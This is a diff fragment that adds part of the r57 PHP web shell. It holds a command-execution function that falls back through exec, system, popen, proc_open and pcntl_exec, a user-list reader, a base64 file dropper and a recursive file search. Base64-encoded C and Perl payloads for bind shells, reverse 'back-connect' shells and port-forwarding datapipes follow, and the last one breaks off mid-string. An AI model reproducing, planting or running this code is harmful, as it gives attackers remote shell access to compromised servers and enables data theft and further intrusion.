+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); 
+  }                                                          
+
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(@function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(@function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(@function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   if(@function_exists('fread') && @function_exists('feof')){
+    while(!@feof($f)) { $res .= @fread($f,1024); }
+   }else if(@function_exists('fgets') && @function_exists('feof')){
+    while(!@feof($f)) { $res .= @fgets($f,1024); }
+   }
+   @pclose($f);
+  }
+  elseif(@is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))
+  {
+   $res = "";
+   if(@function_exists('fread') && @function_exists('feof')){
+    while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}
+   }else if(@function_exists('fgets') && @function_exists('feof')){
+    while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}
+   }
+   @proc_close($f);
+  }
+  elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork'))
+   {
+    $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
+    $pid = @pcntl_fork();
+    if ($pid == -1) {
+     $res .= '[-] Could not children fork. Exit';
+    } else if ($pid) {
+         if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
+         else {$res .= '[-] Error. Command incorrect.';}
+    } else {
+         $cfe = array(" -e 'system(\"$cfe\")'");
+         if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
+         if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
+         die();
+    }
+   }
+ }
+ return $res;
+}
+function get_users($filename)
+{
+  $users = array();
+  $rows=@explode("\n",readzlib($filename));
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+   $user = @explode(":",trim($string));
+   if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users; 
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = '';
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return false; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0);
+ if($w_file)
+ {
+ @fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text)) or @file_put_contents($fname,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)) || (@function_exists('scandir')))
+    {
+      while ((false !== ($file = @readdir($handle))) && (false !== ($file = @scandir($dir))))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
